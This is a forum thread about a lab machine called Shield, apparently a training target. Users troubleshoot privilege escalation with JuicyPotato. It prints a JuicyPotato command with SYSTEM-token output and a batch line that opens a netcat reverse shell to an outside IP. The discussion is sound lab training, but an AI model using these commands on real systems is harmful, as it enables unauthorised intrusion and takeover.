Starting Point: Shield, JuicyPotato and netcat

Hi All,

I was able to get a limited shell without using metasploit but couldn’t escalate privileges without looking at the walkthrough. I have a few questions.

  1. What are the clues that point to using juicyPotato? i did enumeration but nothing jumped out at me. Searching for “windows server 2016 standard 10” with searchsploit, but the output did not contain anything about juicyPotato (or rottenPotato).

  2. Is there a way to escalate privileges without using metasploit?

  3. How does juicyPotato work on a high level? I looked at a few online resources but I’m still confused.

Thanks

Type your comment> @theTCP said:

If it makes anyone feel better, I spent 6+ hours trying to figure what I was doing wrong, feeling like a dumbass and it happened to be that I was downloading an empty JuicyPotatoe.exe because my browser was blocking it. CHECK THE FILE SIZE!

hahahaha I’ve been like what the heck man. But I did the same thing! Thanks for posting

can someone take a look at this and tell me where i’ve gone wrong? I’ve been glued to the computer for hours! lol

C:\inetpub\wwwroot\wordpress\wp-content\uploads>js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337

[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

Thats the last step except I dont get a shell on my listening port

@R4ZZB33RY What port are you listening on?

@tasidonya 5555
thats whats in my .bat file as well

Your command looks good to me. That’s very odd! I would assume that shell.bat is in the correct directory as well. The only thing that comes to mind is if there is anyone else doing Shield at the same time as you and using shell.bat as their file name - it might have got overwritten by their details instead, as Starting Point VMs are shared between everyone.

Type your comment> @tasidonya said:

Your command looks good to me. That’s very odd! I would assume that shell.bat is in the correct directory as well. The only thing that comes to mind is if there is anyone else doing Shield at the same time as you and using shell.bat as their file name - it might have got overwritten by their details instead, as Starting Point VMs are shared between everyone.

yeah thats right. I’ll just check back on it.

Thanks

@R4ZZB33RY can you show us the contents of your shell.bat file? Everything else looks fine so I’d suspect something is wrong in that. Either that or you have something blocking the incoming connection on your end (firewall etc). Have you confirmed it works fine if you just run the shell.bat normally from the remote machine rather than trying to run it with js.exe as system?

@vbScrub
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

Type your comment> @R4ZZB33RY said:

@vbScrub
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

your .bat file is not correct

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)

Type your comment> @VbScrub said:

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)

I ended up figuring it out. Thanks for the reply!

Type your comment> @R4ZZB33RY said:

Type your comment> @VbScrub said:

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)

I ended up figuring it out. Thanks for the reply!

Great :smiley:

guys, I don’t get how to download juicypotato. if I go to the github page, and i donload it, there is not file called JuicyPotato.exe. where is it??

Here you go: Releases · ohpe/juicy-potato · GitHub

Type your comment> @tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

thank you, but when I download the .exe file, it’s empty??

Type your comment> @Jade86 said:

Type your comment> @tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

thank you, but when I download the .exe file, it’s empty??

it gets flagged by your operating system. You have to open the file

Check your antivirus/firewall. It is definitely not empty, since that’s what I have used.

Type your comment> @tasidonya said:

Check your antivirus/firewall. It is definitely not empty, since that’s what I have used.

ok I’ll do that. Just to be absolutely sure, you just clicked on the file and it downloaded, yeah?

@Jade86 yes.